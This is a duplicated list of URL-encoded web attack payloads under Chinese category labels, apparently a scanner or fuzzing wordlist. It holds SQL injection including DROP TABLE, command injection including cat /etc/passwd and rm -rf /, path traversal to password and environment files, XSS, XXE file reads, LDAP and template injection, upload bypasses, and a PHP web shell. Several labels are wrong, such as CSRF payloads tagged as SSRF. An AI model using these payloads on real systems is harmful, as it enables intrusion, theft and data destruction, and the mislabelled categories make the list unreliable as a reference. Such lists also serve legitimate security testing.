whois_raw.cgi#whois_raw.cgi?fqdn=%0acat%20/etc/passwd
faxsurvey#faxsurvey?/bin/cat%20/etc/passwd
SQL注入攻击#1%27%3B%20SELECT%20%2A%20FROM%20users%3B%20--
SQL注入攻击#%27%3B%20DROP%20TABLE%20users%3B%20--
SQL注入攻击#UNION%20ALL%20SELECT%20username%2C%20password%20FROM%20admin%20--
命令注入攻击#%3B%20ls%20-l
命令注入攻击#%7C%20cat%20%2Fetc%2Fpasswd
命令注入攻击#%24%28rm%20-rf%20%2F%29
目录遍历攻击#../../../../etc/passwd
目录遍历攻击#../..//../etc/passwd
目录遍历攻击#......%5Cetc%5Cpasswd
目录遍历攻击#../../../../../etc/passwd%00
目录遍历攻击#../../../../proc/self/environ
XSS攻击#%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E
XSS攻击#%3Cimg%20src%3D%22x%22%20onerror%3D%22alert%28%27XSS%27%29%22%20%2F%3E
XSS攻击#%3Ca%20href%3D%22javascript%3Aalert%28%27XSS%27%29%22%3EClick%20Me%3C%2Fa%3E
XSS攻击#%3Cscript%3Edocument.cookie%3C%2Fscript%3E
XSS攻击#%3Cimg%20src%3D%22http%3A%2F%2Fattacker.com%2Fevil-image.jpg%22%20%2F%3E
XSS攻击#%3Ca%20href%3D%22javascript%3Aalert%28%27XSS%27%29%22%3EClick%20Me%3C%2Fa%3E
SSRF攻击#%3Cimg%20src%3D%22http%3A%2F%2Fvictim.com%2Ftransfer%3Famount%3D10000%26recipient%3Dattacker%22%20%2F%3E
SSRF攻击#%3Cform%20action%3D%22http%3A%2F%2Fvictim.com%2Fchange-password%22%20method%3D%22POST%22%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22new_password%22%20value%3D%22hacked%22%3E%3C%2Fform%3E
XXE攻击#%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E
XXE攻击#%3Cxml%3E%3Cdata%3E%3C!%5BCDATA%5B%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%5D%5D%3E%3C%2Fdata%3E%3C%2Fxml%3E
LDAP注入攻击#%28%26%28username%3Dadmin%29%28password%3D%29%29
LDAP注入攻击#%28admin%29%28password%3D%29%28%7C%28uid%3D%29%29
文件上传漏洞攻击#evil.php%3B
文件上传漏洞攻击#shell.php%00.jpg
文件上传漏洞攻击#%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E
模板注入攻击#%23%7B7%20*%207%7D
模板注入攻击#%7B%7Bconfig.items%28%29%7D%7D
模板注入攻击##%7B7%20*%207%7D
XXE攻击#%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E
XXE攻击#%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20%25%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%20%25xxe%3B%5D%3E
HTTP参数污染攻击#%3Fparam%3Devil%26param%3Dlegitimate
HTTP参数污染攻击#%3Fparam%3D%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
HTTP参数污染攻击#%3Fparam%3D%3Cimg%20src%3Dx%20onerror%3Dalert%28%27XSS%27%29%3E
LDAP注入攻击#%28%26%28uid%3Dadmin%29%28password%3D%29%29
LDAP注入攻击#%28username%3Dadmin%29%28password%3D%29%28%7C%28uid%3D%2A%29%29
WebSocket注入攻击#%3Cscript%3Ewebsocket.send%28%22Payload%22%29%3B%3C%2Fscript%3E
WebSocket注入攻击#%3Cimg%20src%3D%22x%22%20onerror%3D%22websocket.send%28%27Payload%27%29%22%3E
点击劫持攻击#%3Ciframe%20src%3D%22http%3A%2F%2Fvictim.com%22%20style%3D%22opacity%3A0%22%3E%3C%2Fiframe%3E
whois_raw.cgi#whois_raw.cgi?fqdn=%0acat%20/etc/passwd
faxsurvey#faxsurvey?/bin/cat%20/etc/passwd
SQL注入攻击#1%27%3B%20SELECT%20%2A%20FROM%20users%3B%20--
SQL注入攻击#%27%3B%20DROP%20TABLE%20users%3B%20--
SQL注入攻击#UNION%20ALL%20SELECT%20username%2C%20password%20FROM%20admin%20--
命令注入攻击#%3B%20ls%20-l
命令注入攻击#%7C%20cat%20%2Fetc%2Fpasswd
命令注入攻击#%24%28rm%20-rf%20%2F%29
目录遍历攻击#../../../../etc/passwd
目录遍历攻击#../..//../etc/passwd
目录遍历攻击#......%5Cetc%5Cpasswd
目录遍历攻击#../../../../../etc/passwd%00
目录遍历攻击#../../../../proc/self/environ
XSS攻击#%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E
XSS攻击#%3Cimg%20src%3D%22x%22%20onerror%3D%22alert%28%27XSS%27%29%22%20%2F%3E
XSS攻击#%3Ca%20href%3D%22javascript%3Aalert%28%27XSS%27%29%22%3EClick%20Me%3C%2Fa%3E
XSS攻击#%3Cscript%3Edocument.cookie%3C%2Fscript%3E
XSS攻击#%3Cimg%20src%3D%22http%3A%2F%2Fattacker.com%2Fevil-image.jpg%22%20%2F%3E
XSS攻击#%3Ca%20href%3D%22javascript%3Aalert%28%27XSS%27%29%22%3EClick%20Me%3C%2Fa%3E
SSRF攻击#%3Cimg%20src%3D%22http%3A%2F%2Fvictim.com%2Ftransfer%3Famount%3D10000%26recipient%3Dattacker%22%20%2F%3E
SSRF攻击#%3Cform%20action%3D%22http%3A%2F%2Fvictim.com%2Fchange-password%22%20method%3D%22POST%22%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22new_password%22%20value%3D%22hacked%22%3E%3C%2Fform%3E
XXE攻击#%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E
XXE攻击#%3Cxml%3E%3Cdata%3E%3C!%5BCDATA%5B%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%5D%5D%3E%3C%2Fdata%3E%3C%2Fxml%3E
LDAP注入攻击#%28%26%28username%3Dadmin%29%28password%3D%29%29
LDAP注入攻击#%28admin%29%28password%3D%29%28%7C%28uid%3D%29%29
文件上传漏洞攻击#evil.php%3B
文件上传漏洞攻击#shell.php%00.jpg
文件上传漏洞攻击#%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E
模板注入攻击#%23%7B7%20*%207%7D
模板注入攻击#%7B%7Bconfig.items%28%29%7D%7D
模板注入攻击##%7B7%20*%207%7D
XXE攻击#%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E
XXE攻击#%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20%25%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%20%25xxe%3B%5D%3E
HTTP参数污染攻击#%3Fparam%3Devil%26param%3Dlegitimate
HTTP参数污染攻击#%3Fparam%3D%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
HTTP参数污染攻击#%3Fparam%3D%3Cimg%20src%3Dx%20onerror%3Dalert%28%27XSS%27%29%3E
LDAP注入攻击#%28%26%28uid%3Dadmin%29%28password%3D%29%29
LDAP注入攻击#%28username%3Dadmin%29%28password%3D%29%28%7C%28uid%3D%2A%29%29
WebSocket注入攻击#%3Cscript%3Ewebsocket.send%28%22Payload%22%29%3B%3C%2Fscript%3E
WebSocket注入攻击#%3Cimg%20src%3D%22x%22%20onerror%3D%22websocket.send%28%27Payload%27%29%22%3E
点击劫持攻击#%3Ciframe%20src%3D%22http%3A%2F%2Fvictim.com%22%20style%3D%22opacity%3A0%22%3E%3C%2Fiframe%3E
